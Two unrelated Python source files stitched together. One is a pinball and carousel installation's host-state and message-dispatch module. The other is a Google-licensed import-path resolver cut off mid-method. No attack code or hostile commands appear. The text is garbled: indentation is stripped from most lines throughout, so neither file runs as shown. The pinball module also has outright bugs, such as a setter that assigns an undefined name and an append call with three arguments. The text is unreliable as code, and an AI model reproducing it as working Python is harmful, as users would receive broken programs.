return self.response_current_sensor_nominal
class Controller(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.safety_enable = False
self.tb = tb
def get_safety_enable(self):
return self.safety_enable
def set_safety_enable(self,safety_enable):
self.safety_enable = safety_enable
def get_computer_details(self):
return {
"df":self.tb.get_system_disk(),
"cpu_temp":self.tb.get_core_temp(),
"pinball_git_timestamp":self.tb.app_get_git_timestamp(),
"tb_git_timestamp":self.tb.tb_get_git_timestamp(),
}
class Carousel(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
self.carousel_error = {}
self.solenoids_present = [
False,
False,
False,
False,
False
]
self.balls_present = [
False,
False,
False,
False,
False
]
def request_solenoids_present(self):
self.tb.publish(topic="request_solenoids_present",message=True,destination=self.hostname)
def set_solenoids_present(self, solenoids_present):
self.solenoids_present = solenoids_present
def get_solenoids_present(self):
return self.solenoids_present
def set_carousel_ball_detected(self, balls_present):
self.balls_present = balls_present
def get_carousel_ball_detected(self):
return self.balls_present
def request_eject_ball(self, fruit_name):
self.tb.publish(topic="cmd_carousel_eject_ball",message=fruit_name,destination=self.hostname)
def request_system_tests(self):
self.tb.publish(topic="request_system_tests",message=True,destination=self.hostname)
def cmd_carousel_lights(self, group, animation):
self.tb.publish(
topic="cmd_carousel_lights",
message=[group, animation],
destination=self.hostname
)
def cmd_carousel_all_off(self):
self.tb.publish(
topic="cmd_carousel_all_off",
message=True,
destination=self.hostname
)
def set_carousel_error(self,carousel_error):
self.carousel_error = carousel_error
    def get_carousel_error(self):
        return self.carousel_error
class Matrix(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
        self.sdc2160_present = {
            "carousel1and2":False,
            "carousel3and4":False,
            "carousel5and6":False,
        }
        self.sdc2160_faults = None  # populated via set_sdc2160_faults()
self.carousel_names = [
"carousel1",
"carousel2",
"carousel3",
"carousel4",
"carousel5",
"carouselcenter",
]
self.sdc2160_controller_faults = [
None,None,None,
]
self.sdc2160_channel_faults = [
None,
None,
None,
None,
None,
None,
]
self.amt203_present = [
False,
False,
False,
False,
False,
False,
]
self.amt203_zeroed = [
False,
False,
False,
False,
False,
False,
]
self.amt203_absolute_position = [
None,
None,
None,
None,
None,
None,
]
self.sdc2160_relative_position = [
None,
None,
None,
None,
None,
None,
]
self.sdc2160_closed_loop_error = [
None,
None,
None,
None,
None,
None,
]
        self.motors = [
            {
                "current":0,
                "temp":0,
                "pid_error":0,
                "status":0,
                "target":0,
                "discrepancy":0,
                "target_reached":[False,0],
                "stalled":[False,0],
                "timeout":[False,0],
            }
            for _ in range(6)
        ]
        self.motor_by_carousel_name = {
            "carousel_1":self.motors[0],
            "carousel_2":self.motors[1],
            "carousel_3":self.motors[2],
            "carousel_4":self.motors[3],
            "carousel_5":self.motors[4],
            "carousel_center":self.motors[5],
        }
self.target_position = [
0,0,0,0,0,0
]
self.target_position_confirmed = [
False,
False,
False,
False,
False,
False,
]
self.named_positions = {
"center_front":0,
"center_back":0,
"trueque_tube":0,
"dinero_tube":0,
"exchange_left_prep":0,
"exchange_right_prep":0,
}
self.fruit_positions = [0,0,0,0,0,0]
def cmd_rotate_carousel_to_target(self, carousel_name, fruit_name, position_name):
self.tb.publish(topic="cmd_rotate_carousel_to_target", message=[carousel_name, fruit_name, position_name])
def get_amt203_absolute_position(self, fruit_id):
return self.amt203_absolute_position[fruit_id]
def get_amt203_absolute_position_populated(self):
if None in self.amt203_absolute_position:
return False
return True
def get_amt203_present(self):
return all(self.amt203_present)
def get_amt203_zeroed(self):
return False not in self.amt203_zeroed
def get_destination_reached(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["target_reached"]
def get_destination_stalled(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["stalled"]
def get_destination_timeout(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["timeout"]
def get_motor_details(self, property, fruit_id):
return self.motors[fruit_id][property]
def get_sdc2160_channel_faults(self):
return self.sdc2160_channel_faults
def get_sdc2160_closed_loop_error(self):
return self.sdc2160_closed_loop_error
def get_sdc2160_controller_faults(self):
return self.sdc2160_controller_faults
def get_sdc2160_faults(self):
return self.sdc2160_faults
def get_sdc2160_present(self):
return all(self.sdc2160_present.values())
def get_sdc2160_relative_position(self, fruit_id=-1):
if fruit_id == -1:
return self.sdc2160_relative_position
else:
return self.sdc2160_relative_position[fruit_id]
def get_target_position_confirmed(self):
return self.target_position_confirmed
def request_amt203_absolute_position(self, fruit_id):
self.tb.publish(topic="request_amt203_absolute_position", message="")
def request_amt203_present(self):
self.tb.publish(topic="request_amt203_present", message="")
def request_amt203_zeroed(self): # this is a command, not a query
self.tb.publish(topic="request_amt203_zeroed", message="")
def request_motor_details(self, property, fruit_id):
self.tb.publish(topic="request_motor_details", message=[property, fruit_id])
def request_sdc2160_channel_faults(self):
self.tb.publish(topic="request_sdc2160_channel_faults", message="")
def request_sdc2160_closed_loop_error(self):
self.tb.publish(topic="request_sdc2160_closed_loop_error", message="")
def request_sdc2160_controller_faults(self):
self.tb.publish(topic="request_sdc2160_controller_faults", message="")
def request_sdc2160_faults(self):
self.tb.publish(topic="request_sdc2160_faults", message="")
def request_sdc2160_present(self):
self.tb.publish(topic="request_sdc2160_present", message="")
def request_sdc2160_relative_position(self, fruit_id):
self.tb.publish(topic="request_sdc2160_relative_position", message="")
def request_target_position_confirmed(self):
self.tb.publish(topic="request_target_position_confirmed", message="")
def response_high_power_disabled(self):
self.tb.publish(topic="response_high_power_enabled", message=False)
def response_high_power_enabled(self):
self.tb.publish(topic="response_high_power_enabled", message=True)
def sdc2160_channel_faults_populated(self):
if None in self.sdc2160_channel_faults:
return False
return True
def sdc2160_closed_loop_error_populated(self):
if None in self.sdc2160_closed_loop_error:
return False
return True
def sdc2160_controller_faults_populated(self):
if None in self.sdc2160_controller_faults:
return False
return True
def sdc2160_relative_position_populated(self):
if None in self.sdc2160_relative_position:
return False
return True
def set_amt203_absolute_position(self, absolute_position, fruit_id=-1):
if fruit_id == -1 or fruit_id == None:
self.amt203_absolute_position = absolute_position
else:
self.amt203_absolute_position[fruit_id] = absolute_position
def set_amt203_present(self,amt203_present):
self.amt203_present = amt203_present
def set_amt203_zeroed(self,amt203_zeroed):
self.amt203_zeroed = amt203_zeroed
def set_destination_reached(self, motor_name, reached, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["target_reached"] = [reached, time.time()]
def set_destination_stalled(self, motor_name, stalled, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["stalled"] = [stalled, time.time()]
def set_destination_timeout(self, motor_name, timeout, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["timeout"] = [timeout, time.time()]
def set_motor_details(self, property, fruit_id, value):
self.motors[fruit_id][property] = value
def set_sdc2160_channel_faults(self,sdc2160_channel_faults):
self.sdc2160_channel_faults = sdc2160_channel_faults
def set_sdc2160_closed_loop_error(self,sdc2160_closed_loop_error):
self.sdc2160_closed_loop_error = sdc2160_closed_loop_error
def set_sdc2160_controller_faults(self,sdc2160_controller_faults):
self.sdc2160_controller_faults = sdc2160_controller_faults
def set_sdc2160_faults(self,sdc2160_present):
self.sdc2160_faults = sdc2160_faults
def set_sdc2160_present(self,presence):
self.sdc2160_present = presence
def set_sdc2160_relative_position(self, relative_position, fruit_id = -1):
print("set_sdc2160_relative_position",relative_position, fruit_id)
if fruit_id == -1:
self.sdc2160_relative_position = relative_position
else:
self.sdc2160_relative_position[fruit_id] = relative_position
def set_target_position_confirmed(self,fruit_id,state_bool):
self.target_position_confirmed[fruit_id] = state_bool
class Pinball(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self._48v_current = -1
self.barter_points = -1
self.current_sensor_present= False
self.gameplay_enabled = False
self.gutter_ball_detected = False
self.left_stack_inventory = -1
self.money_points = -1
self.right_stack_inventory = -1
self.roll_inner_left = False
self.roll_inner_right = False
self.roll_outer_left = False
self.roll_outer_right = False
self.tb = tb
self.troughsensor_value = False
self.barter_mode_score = 0
self.money_mode_score = 0
self.playfield_switch_active = {
"trough_sensor":False,
"roll_outer_left":False,
"roll_inner_left":False,
"roll_outer_right":False,
"roll_inner_right":False,
}
self.button_light_active = {
"izquierda":False,
"trueque":False,
"comienza":False,
"dinero":False,
"derecha":False,
}
self.button_switch_active = {
"izquierda":False,
"trueque":False,
"comienza":False,
"dinero":False,
"derecha":False,
}
#is this list useful here?
self.playfield_animations = {
"trail_rollover_right":None,
"trail_rollover_left":None,
"trail_sling_right":None,
"trail_sling_left":None,
"trail_pop_left":None,
"trail_pop_right":None,
"trail_pop_middle":None,
"trail_spinner":None,
"pie_rollover_right":None,
"pie_rollover_left":None,
"pie_sling_right":None,
"pie_sling_left":None,
"pie_pop_left":None,
"pie_pop_right":None,
"pie_pop_middle":None,
"pie_spinner":None,
"sign_arrow_left":None,
"sign_bottom_right":None,
"sign_top":None,
}
def enable_gameplay(self):
self.gameplay_enabled = True
self.tb.publish(topic="enable_gameplay", message="",destination=self.hostname)
def disable_gameplay(self):
self.gameplay_enabled = False
self.tb.publish(topic="disable_gameplay", message="",destination=self.hostname)
    def enable_trueque_coil(self, enable_bool, milliseconds=20):
        # no current need to store state locally
        self.tb.publish(topic="cmd_enable_trueque_coil", message=[enable_bool,milliseconds],destination=self.hostname)
    def enable_dinero_coil(self, enable_bool, milliseconds=20):
        # no current need to store state locally
        self.tb.publish(topic="cmd_enable_dinero_coil", message=[enable_bool,milliseconds],destination=self.hostname)
    def enable_kicker_coil(self, enable_bool, milliseconds=20):
        # no current need to store state locally
        self.tb.publish(topic="cmd_enable_kicker_coil", message=[enable_bool,milliseconds],destination=self.hostname)
    def enable_izquierda_coil(self, enable_bool, milliseconds=20):
        # no current need to store state locally
        self.tb.publish(topic="cmd_enable_izquierda_coil", message=[enable_bool,milliseconds],destination=self.hostname)
    def enable_derecha_coil(self, enable_bool, milliseconds=20):
        # no current need to store state locally
        self.tb.publish(topic="cmd_enable_derecha_coil", message=[enable_bool,milliseconds],destination=self.hostname)
### LEFT TUBE ###
def request_lefttube_present(self):
self.tb.publish(topic="request_lefttube_present", message="",destination=self.hostname)
def set_lefttube_present(self,lefttube_present):
self.lefttube_present = lefttube_present
def get_lefttube_present(self):
return self.lefttube_present
def set_lefttube_value(self,lefttube_value):
self.lefttube_value = lefttube_value
def get_lefttube_value(self):
return self.lefttube_value
def cmd_lefttube_launch(self):
self.tb.publish(
topic="cmd_lefttube_launch",
message=True,
destination=self.hostname
)
def set_left_stack_inventory(self,left_stack_inventory):
self.left_stack_inventory = left_stack_inventory
def get_left_stack_inventory(self):
return self.left_stack_inventory
def set_barter_points(self,barter_points):
self.barter_points = barter_points
def get_barter_points(self):
return self.barter_points
def request_money_points(self):
self.tb.publish(
topic="request_money_points",
message="",
destination=self.hostname
)
### RIGHT TUBE ###
def request_righttube_present(self):
self.tb.publish(topic="request_righttube_present", message="",destination=self.hostname)
def set_righttube_present(self,righttube_present):
self.righttube_present = righttube_present
def get_righttube_present(self):
return self.righttube_present
def set_righttube_value(self,righttube_value):
self.righttube_value = righttube_value
def get_righttube_value(self):
return self.righttube_value
def cmd_righttube_launch(self):
self.tb.publish(
topic="cmd_righttube_launch",
message=True,
destination=self.hostname
)
def set_right_stack_inventory(self,right_stack_inventory):
self.right_stack_inventory = right_stack_inventory
def get_right_stack_inventory(self):
return self.right_stack_inventory
def set_money_points(self,money_points):
self.money_points = money_points
def request_troughsensor_value(self):
self.tb.publish(topic="request_troughsensor_value", message="",destination=self.hostname)
def set_troughsensor_value(self,troughsensor_value):
self.troughsensor_value = troughsensor_value
def get_troughsensor_value(self):
return self.troughsensor_value
def cmd_kicker_launch(self):
self.tb.publish(
topic="cmd_kicker_launch",
message=True,
destination=self.hostname
)
def set_roll_outer_left(self,roll_outer_left):
self.roll_outer_left = roll_outer_left
def set_roll_outer_right(self,roll_outer_right):
self.roll_outer_right = roll_outer_right
def set_roll_inner_right(self,roll_inner_right):
self.roll_inner_right = roll_inner_right
def set_roll_inner_left(self,roll_inner_left):
self.roll_inner_left = roll_inner_left
def request_button_switch_active(self, button_name, state_bool):
self.tb.publish(
topic="request_button_switch_active",
message=[button_name, state_bool],
destination=self.hostname
)
def set_button_switch_active(self,button_name, state_bool):
self.button_switch_active[button_name] = state_bool
    def get_button_switch_active(self, button_name):
        return self.button_switch_active[button_name]
def request_button_light_active(self, button_name, state_bool):
self.tb.publish(
topic="request_button_light_active",
message=[button_name, state_bool],
destination=self.hostname
)
def set_button_light_active(self,button_name, state_bool):
self.button_light_active[button_name] = state_bool
    def get_button_light_active(self, button_name):
        return self.button_light_active[button_name]
def cmd_gamestation_all_off(self, state_bool):
self.tb.publish(
topic="cmd_all_off",
message=state_bool,
destination=self.hostname
)
def cmd_playfield_lights(self, group, animation):
self.tb.publish(
topic="cmd_playfield_lights",
message=[group, animation],
destination=self.hostname
)
class Display(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
self.phrases = ("juega","dinero","trueque","como","fue")
self.current_number = -1
self.current_phrase_key = ""
self.shift_registers_connected = False
self.current_score_name = ""
self.solenoids_present = [
False,
False,
False,
False,
False,
]
self.leds_present = {
"A":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"B":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"C":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"words":[
False,
False,
False,
False,
False,
]
}
def request_score(self, score_name):
self.current_score_name = score_name
self.tb.publish(topic="cmd_play_score",message=score_name,destination=self.hostname)
def request_phrase(self, phrase_key):
self.current_phrase_key = phrase_key
self.tb.publish(topic="cmd_set_phrase",message=phrase_key,destination=self.hostname)
    def set_phrase(self,phrase_key): # in case the phrase is set through a method other than self.request_phrase
self.current_phrase_key = phrase_key
def get_phrase(self):
return self.current_phrase_key
def request_number(self, number):
self.current_number = number
self.tb.publish(topic="cmd_set_number",message=number,destination=self.hostname)
def set_number(self, number):
self.current_number = number
def get_number(self):
return self.current_number
def request_leds_present(self):
self.tb.publish(topic="request_display_leds_present", message="",destination="pinball1display")
def set_leds_present(self,leds_present):
self.leds_present = leds_present
def get_leds_present(self):
return self.leds_present
def request_solenoids_present(self):
self.tb.publish(topic="request_display_solenoids_present", message="",destination="pinball1display")
def set_solenoids_present(self,solenoids_present):
self.solenoids_present = solenoids_present
def get_solenoids_present(self):
return self.solenoids_present
def cmd_all_off(self):
self.tb.publish(topic="cmd_all_off",message="")
class Hosts():
def __init__(self, tb ):
self.tb = tb
self.controller = Controller("controller", tb)
self.carousel1 = Carousel("carousel1", tb)
self.carousel2 = Carousel("carousel2", tb)
self.carousel3 = Carousel("carousel3", tb)
self.carousel4 = Carousel("carousel4", tb)
self.carousel5 = Carousel("carousel5", tb)
self.carouselcenter = Carousel("carouselcenter", tb)
self.pinball1display = Display("pinball1display", tb)
self.pinball2display = Display("pinball2display", tb)
self.pinball3display = Display("pinball3display", tb)
self.pinball4display = Display("pinball4display", tb)
self.pinball5display = Display("pinball5display", tb)
self.pinball1game = Pinball("pinball1game", tb)
self.pinball2game = Pinball("pinball2game", tb)
self.pinball3game = Pinball("pinball3game", tb)
self.pinball4game = Pinball("pinball4game", tb)
self.pinball5game = Pinball("pinball5game", tb)
self.pinballmatrix = Matrix("pinballmatrix", tb)
self.hostnames = {
'controller':self.controller,
'carousel1':self.carousel1,
'carousel2':self.carousel2,
'carousel3':self.carousel3,
'carousel4':self.carousel4,
'carousel5':self.carousel5,
'carouselcenter':self.carouselcenter,
'pinball1display':self.pinball1display,
'pinball2display':self.pinball2display,
'pinball3display':self.pinball3display,
'pinball4display':self.pinball4display,
'pinball5display':self.pinball5display,
'pinball1game':self.pinball1game,
'pinball2game':self.pinball2game,
'pinball3game':self.pinball3game,
'pinball4game':self.pinball4game,
'pinball5game':self.pinball5game,
'pinballmatrix':self.pinballmatrix,
}
self.dispatch(b"response_computer_details", self.controller.get_computer_details(), "controller", "controller")
self.games_with_players = []
def clear_games_with_players(self):
self.games_with_players = []
def get_games_with_players(self):
return list(self.games_with_players)
def set_games_with_players(self,game_ordinal):
if game_ordinal not in self.games_with_players:
self.games_with_players.append(game_ordinal)
def get_all_host_connected(self):
for hostname in self.hostnames:
if hostname != "controller":
if self.hostnames[hostname].get_connected() == False:
return False
return True
def request_all_computer_details(self):
self.tb.publish("request_computer_details",True)
def get_all_computer_details_received(self):
absent_list = []
host_keys = self.hostnames.keys()
host_list = list(host_keys)
host_list.remove("controller")
for name in host_list:
if self.hostnames[name].get_computer_details_received() == False:
absent_list.append(name)
print("get_all_computer_details_received.absent_list",absent_list)
return len(absent_list) == 0
    def get_all_current_sensor_present(self):
        # to do: implement real aggregation; currently reports True unconditionally
        return True
    def get_all_current_sensor_populated(self):
        # to do: implement real aggregation; currently reports True unconditionally
        return True
def get_all_current_sensor_value(self):
# to do : add controller
names = ['pinball1display','pinball1game','pinball2game','pinball3game','pinball4game','pinball5game']
for name in names:
if self.hostnames[name].get_current_sensor_value() == False:
return False
return True
def get_all_current_sensor_nominal(self):
# to do : add controller
names = ['pinball1display','pinball1game','pinball2game','pinball3game','pinball4game','pinball5game']
for name in names:
#print("get_all_current_sensor_nominal",name, self.hostnames[name].get_current_sensor_nominal())
if self.hostnames[name].get_current_sensor_nominal() == False:
return False
return True
def get_all_non_nominal_states(self):
non_nominal_states = []
closed_loop_error = self.pinballmatrix.get_sdc2160_closed_loop_error()
closed_loop_error_list = []
        for channel, value in enumerate(closed_loop_error):
if value > 100:
closed_loop_error_list.append([channel, value])
non_nominal_states.append(["pinballmatrix","sdc2160_closed_loop_error",channel, value])
# sdc: check channel faults
channel_faults = self.pinballmatrix.get_sdc2160_channel_faults()
channel_faults_list = []
for channel_name in channel_faults:
channel = channel_faults[channel_name]
if channel["temperature"] > 40:
channel_faults_list.append(["temperature",channel_name, channel["temperature"]])
non_nominal_states.append(["pinballmatrix",channel_name,"temperature", channel["temperature"]])
if channel["closed_loop_error"] > 100:
channel_faults_list.append("closed_loop_error", channel_name,channel["closed_loop_error"])
non_nominal_states.append(["pinballmatrix",channel_name,"closed_loop_error", channel["closed_loop_error"]])
if channel["stall_detection"] != False:
msg = ["stall_detection", channel_name,channel["stall_detection"]]
channel_faults_list.append(msg)
non_nominal_states.append(["pinballmatrix",channel_name,"stall_detection", channel["stall_detection"]])
if channel["motor_amps"] > 6:
channel_faults_list.append(["motor_amps",channel_name, channel["motor_amps"]])
non_nominal_states.append(["pinballmatrix",channel_name,"motor_amps", channel["motor_amps"]])
runtime_status_flags = channel["runtime_status_flags"]
for flag_name in runtime_status_flags:
                if runtime_status_flags[flag_name] != 0:
                    channel_faults_list.append([flag_name, channel_name, runtime_status_flags[flag_name]])
                    non_nominal_states.append(["pinballmatrix",channel_name,flag_name, runtime_status_flags[flag_name]])
# sdc: check controller faults
controller_errors_list = []
controller_faults_list = self.pinballmatrix.get_sdc2160_controller_faults()
controller_faults = {
"carousel1and2":controller_faults_list[0],
"carousel3and4":controller_faults_list[1],
"carousel5and6":controller_faults_list[2],
}
for controller_name in controller_faults:
controller = controller_faults[controller_name]
for fault_name in controller:
if controller[fault_name] != 0:
controller_errors_list.append([fault_name, controller_name,controller[fault_name]])
non_nominal_states.append(["pinballmatrix",controller_name,fault_name, controller[fault_name]])
computer_details_errors = []
for hostname in self.hostnames:
deets = self.hostnames[hostname].get_computer_details()
if deets["cpu_temp"] > 65:
computer_details_errors.append([hostname,"cpu_temp", deets["cpu_temp"]])
non_nominal_states.append([hostname,"computer_details","cpu_temp", deets["cpu_temp"]])
if deets["df"][0] < 500000000:
computer_details_errors.append([hostname,"df", deets["df"]])
non_nominal_states.append([hostname,"computer_details","df", deets["df"]])
# all: check current sensors
return non_nominal_states
def dispatch(self, topic, message, origin, destination):
if isinstance(topic, bytes):
topic = codecs.decode(topic, 'UTF-8')
if isinstance(message, bytes):
message = codecs.decode(message, 'UTF-8')
if isinstance(origin, bytes):
origin = codecs.decode(origin, 'UTF-8')
if isinstance(destination, bytes):
destination = codecs.decode(destination, 'UTF-8')
##### ROUTE MESSAGE TO METHOD #####
if topic == "connected" or topic == "respond_host_connected":
self.hostnames[origin].set_connected(message)
#if topic == "event_button_comienza": # unclear what state data should be stored here
# self.hostnames[origin].event_button_comienza(message)
#if topic == "event_button_derecha": # unclear what state data should be stored here
# self.hostnames[origin].event_button_derecha(message)
#if topic == "event_button_dinero":
# self.hostnames[origin].event_button_dinero(message)
#if topic == "event_button_izquierda": # unclear what state data should be stored here
# self.hostnames[origin].event_button_izquierda(message)
#if topic == "event_button_trueque":
# self.hostnames[origin].event_button_trueque(message)
if topic == "event_carousel_ball_detected":
self.hostnames[origin].set_carousel_ball_detected(message)
if topic == "event_carousel_error":
self.hostnames[origin].set_carousel_error(message)
if topic == "event_carousel_target_reached":
self.hostnames[origin].set_target_position_confirmed(message)
if topic == "event_destination_reached":
motor_name, reached, position, position_error = message
self.hostnames[origin].set_destination_reached(motor_name, reached, position, position_error)
if topic == "event_destination_stalled":
motor_name, stalled, position, position_error = message
self.hostnames[origin].set_destination_stalled(motor_name, stalled, position, position_error)
if topic == "event_destination_timeout":
motor_name, timeout, position, position_error = message
self.hostnames[origin].set_destination_timeout(motor_name, timeout, position, position_error)
#if topic == "event_gamestation_button": # unclear what state data should be stored here
# self.hostnames[origin].event_gamestation_button(message)
if topic == "event_left_stack_ball_present":
self.hostnames[origin].set_lefttube_value(message)
#if topic == "event_left_stack_motion_detected": # unclear what state data should be stored here
# self.hostnames[origin].set_left_stack_motion_detected(message)
#if topic == "event_pop_left": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_left(message)
#if topic == "event_pop_middle": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_middle(message)
#if topic == "event_pop_right": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_right(message)
if topic == "event_right_stack_ball_present":
self.hostnames[origin].set_righttube_value(message)
#if topic == "event_right_stack_motion_detected": # unclear what state data should be stored here
# self.hostnames[origin].set_right_stack_motion_detected(message)
#if topic == "event_roll_inner_left":
# self.hostnames[origin].set_roll_inner_left(message)
#if topic == "event_roll_inner_right":
# self.hostnames[origin].set_roll_inner_right(message)
#if topic == "event_roll_outer_left":
# self.hostnames[origin].set_roll_outer_left(message)
#if topic == "event_roll_outer_right":
        #    self.hostnames[origin].set_roll_outer_right(message)
#if topic == "event_slingshot_left":
# self.hostnames[origin].event_slingshot_left(message)
#if topic == "event_slingshot_right":
# self.hostnames[origin].event_slingshot_right(message)
#if topic == "event_spinner":
# self.hostnames[origin].set_spinner(message)
if topic == "event_trough_sensor":
self.hostnames[origin].set_troughsensor_value(message)
if topic == "response_amt203_absolute_position":
self.hostnames[origin].set_amt203_absolute_position(message)
if topic == "response_amt203_present":
self.hostnames[origin].set_amt203_present(message)
if topic == "response_amt203_zeroed":
self.hostnames[origin].set_amt203_zeroed(message)
if topic == "response_carousel_absolute":
self.hostnames[origin].set_amt203_absolute_position(message)
if topic == "response_carousel_ball_detected":
self.hostnames[origin].set_carousel_ball_detected(message)
if topic == "response_carousel_relative":
self.hostnames[origin].set_sdc2160_relative_position(message)
if topic == "response_computer_details":
self.hostnames[origin].set_computer_details(message)
if topic == "response_current_sensor_nominal":
self.hostnames[origin].set_current_sensor_nominal(message)
if topic == "response_current_sensor_present":
self.hostnames[origin].set_current_sensor_present(message)
if topic == "response_current_sensor_value":
self.hostnames[origin].set_current_sensor_value(message)
if topic == "response_high_power_enabled":
self.hostnames[origin].response_high_power_enabled(message)
if topic == "response_sdc2160_channel_faults":
self.hostnames[origin].set_sdc2160_channel_faults(message)
if topic == "response_sdc2160_closed_loop_error":
self.hostnames[origin].set_sdc2160_closed_loop_error(message)
if topic == "response_sdc2160_controller_faults":
self.hostnames[origin].set_sdc2160_controller_faults(message)
if topic == "response_sdc2160_present":
self.hostnames[origin].set_sdc2160_present(message)
if topic == "response_sdc2160_relative_position":
self.hostnames[origin].set_sdc2160_relative_position(message)
#if topic == "response_visual_tests":
# self.hostnames[origin].set_visual_tests(message)
##### AGGREGATED STATES #####
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Logic for resolving import paths."""
import logging
import os
from . import import_finder
from . import utils
class ImportException(ImportError):
def __init__(self, module_name):
super(ImportException, self).__init__(module_name)
self.module_name = module_name
class ResolvedFile(object):
def __init__(self, path, module_name):
self.path = path
self.module_name = module_name
def is_extension(self):
return self.path.endswith('.so')
@property
def package_name(self):
f, _ = os.path.splitext(self.path)
if f.endswith('__init__'):
return self.module_name
elif '.' in self.module_name:
return self.module_name[:self.module_name.rindex('.')]
else:
return None
@property
def short_path(self):
parts = self.path.split(os.path.sep)
n = self.module_name.count('.')
if parts[-1] == '__init__.py':
n += 1
parts = parts[-(n+1):]
return os.path.join(*parts)
class Direct(ResolvedFile):
"""Files added directly as arguments."""
def __init__(self, path, module_name=''):
# We do not necessarily have a module name for a directly added file.
super(Direct, self).__init__(path, module_name)
class Builtin(ResolvedFile):
"""Imports that are resolved via python's builtins."""
def is_extension(self):
return True
class System(ResolvedFile):
"""Imports that are resolved by python."""
pass
class Local(ResolvedFile):
"""Imports that are found in a local pythonpath."""
def __init__(self, path, module_name, fs):
super(Local, self).__init__(path, module_name)
self.fs = fs
def convert_to_path(name):
"""Converts ".module" to "./module", "..module" to "../module", etc."""
if name.startswith('.'):
remainder = name.lstrip('.')
dot_count = (len(name) - len(remainder))
prefix = '../'*(dot_count-1)
else:
remainder = name
dot_count = 0
prefix = ''
filename = prefix + os.path.join(*remainder.split('.'))
return (filename, dot_count)
def infer_module_name(filename, fspath):
"""Convert a python filename to a module relative to pythonpath."""
filename, _ = os.path.splitext(filename)
for f in fspath:
short_name = f.relative_path(filename)
if short_name:
# The module name for __init__.py files is the directory.
if short_name.endswith(os.path.sep + "__init__"):
short_name = short_name[:short_name.rfind(os.path.sep)]
return short_name.replace(os.path.sep, '.')
# We have not found filename relative to anywhere in pythonpath.
return ''
def get_absolute_name(package, relative_name):
"""Joins a package name and a relative name.
Args:
package: A dotted name, e.g. foo.bar.baz
relative_name: A dotted name with possibly some leading dots, e.g. ..x.y
Returns:
      The relative name appended to the package, after going up one level
      for each leading dot beyond the first (a single leading dot refers
      to the package itself).
      e.g. foo.bar.baz + ..hello.world -> foo.bar.hello.world
The unchanged relative_name if it does not start with a dot
or has too many leading dots.
"""
path = package.split('.') if package else []
name = relative_name.lstrip('.')
ndots = len(relative_name) - len(name)
if ndots > len(path):
return relative_name
absolute_path = path[:len(path) + 1 - ndots]
if name:
absolute_path.append(name)
return '.'.join(absolute_path)
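# Worked examples (matching the implementation above):
#   get_absolute_name('foo.bar.baz', '.hello')        -> 'foo.bar.baz.hello'
#   get_absolute_name('foo.bar.baz', '..hello.world') -> 'foo.bar.hello.world'
#   get_absolute_name('foo', '....x')                 -> '....x'  (too many dots)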
class Resolver:
def __init__(self, fs_path, current_module):
self.fs_path = fs_path
self.current_module = current_module
self.current_directory = os.path.dirname(current_module.path)
def _find_file(self, fs, name):
init = os.path.join(name, '__init__.py')
py = name + '.py'
for x in [init, py]:
if fs.isfile(x):
return fs.refer_to(x)
return None
def resolve_import(self, item):
"""Simulate how Python resolves imports.
Returns the filename of the source file Python would load
when processing a statement like 'import name' in the module
we're currently under.
Args:
item: An instance of ImportItem
Returns:
A filename
Raises:
ImportException: If the module doesn't exist.
"""
name = item.name
# The last part in `from a.b.c import d` might be a symbol rather than a
# module, so we try a.b.c and a.b.c.d as names.
short_name = None
if item.is_from and not item.is_star:
if '.' in name.lstrip('.'):
# The name is something like `a.b.c`, so strip off `.c`.
rindex = name.rfind('.')
else:
# The name is something like `..c`, so strip off just `c`.
rindex = name.rfind('.') + 1
short_name = name[:rindex]
if import_finder.is_builtin(name):
filename = name + '.so'
return Builtin(filename, name)
filename, level = convert_to_path(name)
if level:
# This is a relative import; we need to resolve the filename
# relative to the importing file path.
filename = os.path.normpath(
os.path.join(self.current_directory, filename))
files = [(name, filename)]
if short_name:
short_filename = os.path.dirname(filename)
files.append((short_name, short_filename))
for module_name, path in files:
for fs in self.fs_path:
f = self._find_file(fs, path)
if not f or f == self.current_module.path:
# We cannot import a file from itself.
continue
if item.is_relative():
package_name = self.current_module.package_name
if package_name is None:
# Relative import in non-package
raise ImportException(name)
module_name = get_absolute_name(package_name, module_name)
if isinstance(self.current_module, System):
return System(f, module_name)
return Local(f, module_name, fs)
# If the module isn't found in the explicit pythonpath, see if python
# itself resolved it.
if item.source:
prefix, ext = os.path.splitext(item.source)
mod_name = name
# We need to check for importing a symbol here too.
if short_name:
mod = prefix.replace(os.path.sep, '.')
mod = utils.strip_suffix(mod, '.__init__')
if not mod.endswith(name) and mod.endswith(short_name):
mod_name = short_name
if ext == '.pyc':
pyfile = prefix + '.py'
if os.path.exists(pyfile):
return System(pyfile, mod_name)
elif not ext:
pyfile = os.path.join(prefix, "__init__.py")
if os.path.exists(pyfile):
return System(pyfile, mod_name)
return System(item.source, mod_name)
raise ImportException(name)
def resolve_all(self, import_items):
"""Resolves a list of imports.
Yields filenames.
"""
